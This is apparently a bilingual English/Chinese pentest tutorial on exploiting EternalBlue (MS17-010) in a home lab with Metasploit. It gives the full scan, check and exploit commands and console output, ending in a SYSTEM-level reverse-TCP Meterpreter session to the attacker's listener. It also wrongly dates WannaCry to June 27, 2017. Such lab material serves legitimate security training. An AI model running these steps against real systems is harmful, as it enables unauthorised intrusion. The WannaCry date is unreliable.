Exploiting Windows MS17-010 SMB Vulnerability
MS17-010 EternalBlue Exploit
EternalBlue (MS17-010/CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
The EternalBlue exploit was developed by the NSA (National Security Agency) to take advantage of the MS17-010 vulnerability and was leaked to the public by a hacker group called the Shadow Brokers in 2017.
The EternalBlue exploit takes advantage of a vulnerability in the Windows SMBv1 protocol that allows attackers to send specially crafted packets that consequently facilitate the execution of arbitrary commands.
The EternalBlue exploit was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.
利用 Windows MS17-010 SMB 漏洞
MS17-010 永恒之蓝漏洞
EternalBlue (MS17-010/CVE-2017-0144) 是一组 Windows 漏洞和漏洞利用的名称,这些漏洞和利用允许攻击者远程执行任意代码并获得对 Windows 系统的访问权限,从而访问目标系统所属的网络。
EternalBlue 漏洞由 NSA(国家安全局)开发,用于利用 MS17-010 漏洞,并于 2017 年被名为 Shadow Brokers 的黑客组织泄露给公众。
EternalBlue 漏洞利用了 Windows SMBv1 协议中的一个漏洞,该漏洞允许攻击者发送特制数据包,从而促进任意命令的执行。
EternalBlue 漏洞被用于 2017 年 6 月 27 日的 WannaCry 勒索软件攻击,以跨网络利用其他 Windows 系统,目的是将勒索软件传播到尽可能多的系统。
This vulnerability affects multiple versions of Windows:
- Windows Vista
- Windows 7
- Windows Server 2008
- Windows 8.1
- Windows Server 2012
- Windows 10
- Windows Server 2016
此漏洞影响多个版本的 Windows:
- Windows Vista
- Windows 7
- Windows Server 2008
- Windows 8.1
- Windows Server 2012
- Windows 10
- Windows Server 2016
Microsoft released a patch for the vulnerability in March, 2017, however, many users and companies have still not yet patched their systems.
The EternalBlue exploit has a MSF auxiliary module that can be used to check if a target system if vulnerable to the exploit and also has an exploit module that can be used to exploit the vulnerability on unpatched systems.
The EternalBlue exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system.
微软在 2017 年 3 月发布了针对该漏洞的补丁,但许多用户和公司仍未为其系统打补丁。
EternalBlue exploit 有一个 MSF 辅助模块,可用于检查目标系统是否容易受到该 exploit 的攻击,还有一个 exploit 模块,可用于在未打补丁的系统上利用该漏洞。
EternalBlue 漏洞利用模块可用于利用易受攻击的 Windows 系统,从而为我们提供目标系统上的特权 meterpreter 会话。
Demo: Exploiting Windows MS17-010 SMB Vulnerability(演示:利用 Windows MS17-010 SMB 漏洞)
SMB is used for network file sharing.
The key thing to note here is that this particular vulnerability and consequently the EternalBlue exploit, will provide us with a privileged session. So instead of just getting a standard, non-privileged Meterpreter session, we’re now getting full nt-authority permissions on our Meterpreter session, which pretty much means we have total control over that particular target system. And consequently other devices or other Windows systems on the network.
1
msfconsole
Perform a port scan on the target system in order to identify where the SMB is running.
Create a workspace.
1
workspace -a EternalBlue
Perform an Nmap scan and directly import the results into the MSF database. And more specifically, into our current workspace.
-sS: Perform a SYN scan.
-sV: Perform a service version detection scan.
-O: Perform an operating system detection scan.
1
db_nmap -sS -sV -O 10.10.10.7
List out the services.
1
services
Perform a check using the EternalBlue auxiliary module. This module will be utilized to scan and check whether the target is vulnerable to the EternalBlue exploit.
You can scan an entire subnet if you are performing a penetration test on an entire network, I would recommand performing the vulnerability scanning with this module to essentially check whether any of the Windows systems on a network, are vulnerable to this particular exploit.
1
2
3
4
5
search type:auxiliary EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 10.10.10.7
run
Search for the EternalBlue exploit module.
1
2
3
4
5
search type:exploit EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.7
run
1
meterpreter > sysinfo
Check our privileges by typing in Get User ID command.
1
2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We currently have access on the target system as NT AUTHORITY\SYSTEM, which means we have the highest privileges possible on the Windows system. Which consequently means that we have total and complete control over this system and can execute any commands.
In this particular case, once we have utilized this particular exploit, we do not need to perform any privilege escalation as we’ve already obtained an elevated Meterpreter session.
Home Lab
Kali: 192.168.248.148
Windows 2008 R2: 192.168.248.133
How to detect status, enable, and disable SMB protocols
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 auxiliary(scanner/smb/smb_ms17_010) > db_nmap -sS -sV -O 192.168.248.133
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-27 08:16 EST
[*] Nmap: Nmap scan report for 192.168.248.133
[*] Nmap: Host is up (0.00030s latency).
[*] Nmap: Not shown: 989 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49156/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49157/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49158/tcp open msrpc Microsoft Windows RPC
[*] Nmap: MAC Address: 00:0C:29:F7:9E:3F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows 7|2008|8.1
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
[*] Nmap: OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 78.36 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf6 auxiliary(scanner/smb/smb_ms17_010) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.248.133 135 tcp msrpc open Microsoft Windows RPC
192.168.248.133 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
192.168.248.133 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
192.168.248.133 3389 tcp ssl/ms-wbt-server open
192.168.248.133 49152 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49153 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49154 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49155 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49156 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49157 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49158 tcp msrpc open Microsoft Windows RPC
1
2
3
4
5
6
7
8
9
10
11
12
msf6 > search type:auxiliary EternalBlue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/smb/smb_ms17_010
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
1
2
3
4
5
6
名称 当前设置 是否需要 说明
---- -------------- ------ ----------
CHECK_ARCH true no 检查易受攻击主机上的体系结构
CHECK_DOPU true no 检查易受攻击主机上的 DOUBLEPULSAR
CHECK_PIPE false no 检查易受攻击主机上的命名管道
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt 是 要检查的命名管道列表
1
2
3
4
5
6
7
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.248.133
RHOSTS => 192.168.248.133
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.248.133:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf6 auxiliary(scanner/smb/smb_ms17_010) > search type:exploit EternalBlue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.248.150 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
chines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
es.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.248.148 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.248.133
RHOSTS => 192.168.248.133
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.133:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.248.133:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.133:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.133:445 - The target is vulnerable.
[*] 192.168.248.133:445 - Connecting to target for exploitation.
[+] 192.168.248.133:445 - Connection established for exploitation.
[+] 192.168.248.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.248.133:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.248.133:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.248.133:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.248.133:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.248.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.248.133:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.248.133:445 - Sending all but last fragment of exploit packet
[*] 192.168.248.133:445 - Starting non-paged pool grooming
[+] 192.168.248.133:445 - Sending SMBv2 buffers
[+] 192.168.248.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.248.133:445 - Sending final SMBv2 buffers.
[*] 192.168.248.133:445 - Sending last fragment of exploit packet!
[*] 192.168.248.133:445 - Receiving response from exploit packet
[+] 192.168.248.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.248.133:445 - Sending egg to corrupted connection.
[*] 192.168.248.133:445 - Triggering free of corrupted buffer.
[-] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.248.133:445 - Connecting to target for exploitation.
[+] 192.168.248.133:445 - Connection established for exploitation.
[+] 192.168.248.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.248.133:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.248.133:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.248.133:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.248.133:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.248.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.248.133:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.248.133:445 - Sending all but last fragment of exploit packet
[*] 192.168.248.133:445 - Starting non-paged pool grooming
[+] 192.168.248.133:445 - Sending SMBv2 buffers
[+] 192.168.248.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.248.133:445 - Sending final SMBv2 buffers.
[*] 192.168.248.133:445 - Sending last fragment of exploit packet!
[*] 192.168.248.133:445 - Receiving response from exploit packet
[+] 192.168.248.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.248.133:445 - Sending egg to corrupted connection.
[*] 192.168.248.133:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.248.133
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.248.148:4444 -> 192.168.248.133:49165) at 2023-01-27 08:32:29 -0500
1
2
3
4
5
6
7
8
9
10
meterpreter > sysinfo
Computer : WIN-4QCPUB6FIVL
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
-
Previous
Exploiting A Vulnerable HTTP File Server -
Next
Exploiting WinRM (Windows Remote Management Protocol)
